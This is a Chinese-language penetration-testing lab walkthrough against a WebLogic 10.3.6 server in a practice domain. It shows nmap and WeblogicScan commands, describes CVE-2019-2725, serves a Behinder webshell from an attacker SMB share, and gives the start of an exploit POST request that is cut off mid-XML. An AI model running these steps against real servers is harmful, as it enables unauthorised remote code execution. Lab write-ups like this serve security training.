域环境初始化
DC IP:10.10.10.10 OS:Windows 2012(64) 应用:AD域 WEB IP1:10.10.10.80 IP2:192.168.111.80 OS:Windows 2008(64) 应用:Weblogic 10.3.6 MSSQL 2008 PC IP1:10.10.10.201 IP2:192.168.111.201 OS:Windows 7(32) 应用: 攻击机 IP:192.168.111.5 OS:Kaliweblogic漏洞利用 nmap扫描
nmap -p- -T5 192.168.111.80 -o web
-p- 表示扫描所有端口;
-T5 指定扫描过程使用的时序,总共有6个级别(0-5),级别越高,扫描速度越快,但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况较好的情况下推荐使用T4。
-o 保存扫描结果到文件web
常用端口是开放状态1433是mssql,7001我们知道是weblogic服务,因为我们前面手工开启的。
考虑weblogic服务漏洞,找到WeblogicScan工具扫一下。
工具链接
python3 WeblogicScan.py -u 192.168.111.80 -p 7001
发现一个漏洞
CVE-2019-2725漏洞描述:这是一个Weblogic反序列化远程代码执行漏洞。部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。
启动smbserver共享文件服务我们需要先把/root/Behinder/server/shell.jsp webshell木马程序上传weblogic服务器上。然后再使用冰蝎连接shell.jsp木马程序。
impacket-smbserver share /root/桌面/Behinder/server &
POC:
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.111.80:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 841
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx
关注
打赏
![]()
1688896170
查看更多评论
